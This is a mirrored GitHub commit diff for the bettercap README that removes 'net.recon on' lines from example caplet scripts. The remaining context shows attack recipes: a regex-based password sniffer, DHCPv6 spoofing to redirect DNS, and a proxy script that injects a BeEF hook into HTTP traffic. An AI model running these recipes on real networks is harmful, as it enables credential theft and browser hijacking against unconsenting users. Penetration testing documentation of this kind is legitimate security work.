mirror of
https://github.com/bettercap/bettercap
synced 2025-08-20 21:43:18 -07:00
balls
This commit is contained in:
parent
6cfead59e5
commit
c03c943ddc
1 changed files with 0 additions and 7 deletions
|
@ -135,8 +135,6 @@ Interactive sessions can be scripted with `.cap` files, or `caplets`, the follow
|
||||||
Simple password sniffer.
|
Simple password sniffer.
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
# keep reading arp table for network mapping
|
|
||||||
net.recon on
|
|
||||||
# setup a regular expression for packet payloads
|
# setup a regular expression for packet payloads
|
||||||
set net.sniff.regexp .*password=.+
|
set net.sniff.regexp .*password=.+
|
||||||
# set the sniffer output file
|
# set the sniffer output file
|
||||||
|
@ -158,8 +156,6 @@ set dhcp6.spoof.domains microsoft.com, google.com
|
||||||
# let's give em some contents
|
# let's give em some contents
|
||||||
set http.server.path caplets/www
|
set http.server.path caplets/www
|
||||||
|
|
||||||
# check who's alive on the network
|
|
||||||
net.recon on
|
|
||||||
# serve files
|
# serve files
|
||||||
http.server on
|
http.server on
|
||||||
# redirect DNS request by spoofing DHCPv6 packets
|
# redirect DNS request by spoofing DHCPv6 packets
|
||||||
|
@ -190,7 +186,6 @@ set api.rest.password bcap
|
||||||
|
|
||||||
# actively probe network for new hosts
|
# actively probe network for new hosts
|
||||||
net.probe on
|
net.probe on
|
||||||
net.recon on
|
|
||||||
|
|
||||||
# enjoy /api/session and /api/events
|
# enjoy /api/session and /api/events
|
||||||
api.rest on
|
api.rest on
|
||||||
|
@ -269,8 +264,6 @@ Use a proxy script to inject a BEEF javascript hook:
|
||||||
|
|
||||||
# inject beef hook
|
# inject beef hook
|
||||||
set http.proxy.script caplets/beef-inject.js
|
set http.proxy.script caplets/beef-inject.js
|
||||||
# keep reading arp table for network mapping
|
|
||||||
net.recon on
|
|
||||||
# redirect http traffic to a proxy
|
# redirect http traffic to a proxy
|
||||||
http.proxy on
|
http.proxy on
|
||||||
# wait for everything to start properly
|
# wait for everything to start properly
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue